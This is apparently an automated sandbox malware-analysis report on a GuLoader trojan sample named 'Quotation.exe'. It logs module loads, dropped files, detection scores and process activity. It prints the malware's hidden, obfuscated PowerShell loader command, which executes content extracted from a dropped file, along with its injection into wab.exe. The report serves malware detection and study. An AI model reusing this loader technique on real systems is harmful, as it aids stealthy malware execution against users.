      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
      Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.winEXE@9/16@1/2
      Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\Pictures\Ritualiseringen226.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
      Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsf27D7.tmpJump to behavior
      Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Quotation.exeReversingLabs: Detection: 58%
      Source: Quotation.exeVirustotal: Detection: 15%
      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbl source: powershell.exe, 00000002.00000002.2090205765.00000000076A3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ws\System.Core.pdbE source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 0000000E.00000002.2383373007.0000000005D2E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2098766772.000000000D38C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Obfuscated command line found
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_050B1CF7 pushad ; ret 2_2_050B1D01
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_050B3FB1 push ecx; retf 2_2_050B4005
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083F8A06 push FFFFFF8Bh; iretd 2_2_083F8A08
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08899C47 push FFFFFF8Bh; retf 2_2_08899C4C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889DDCA push FFFFFF8Bh; iretd 2_2_0889DDCE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889E5C0 push eax; retf 2_2_0889E5C9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889E5D2 push eax; retf 2_2_0889E5D4
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889E2B1 push eax; retf 2_2_0889E2BA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889E2C3 push eax; retf 2_2_0889E2C5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889DE15 push FFFFFF8Bh; iretd 2_2_0889DE1A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889EBCD push eax; retf 2_2_0889EBD6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0889EBDF push eax; retf 2_2_0889EBE1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089A9DDE push FFFFFF8Bh; iretd 2_2_089A9DE0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089A9D31 push FFFFFF8Bh; iretd 2_2_089A9D33
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089A9E8B push FFFFFF8Bh; iretd 2_2_089A9E8D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089A6E60 push eax; mov dword ptr [esp], edx2_2_089A7044
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089A9FDF push FFFFFF8Bh; iretd 2_2_089A9FE7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089A9F38 push FFFFFF8Bh; iretd 2_2_089A9F3A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089AA038 push FFFFFF8Bh; iretd 2_2_089AA03A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B488D push 8B061F55h; iretd 2_2_089B4892
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B4ABF push 8B061E9Bh; iretd 2_2_089B4AC4
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D30DD8 push ebp; ret 14_2_05D30DD9
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D2F3E9 push esi; retf 14_2_05D2F3EA
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D3115E push ebp; ret 14_2_05D3115F
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D2FB47 push edi; retf 14_2_05D2FB49
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D2F166 push esi; retf 14_2_05D2F16A
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D32165 push ebp; ret 14_2_05D3216F
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D326DC push ebp; ret 14_2_05D326DD
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D300F8 push ebp; ret 14_2_05D300F9
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D2F2E9 push esi; retf 14_2_05D2F2EA
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_05D320EE push ebp; ret 14_2_05D3216F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exeJump to dropped file
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
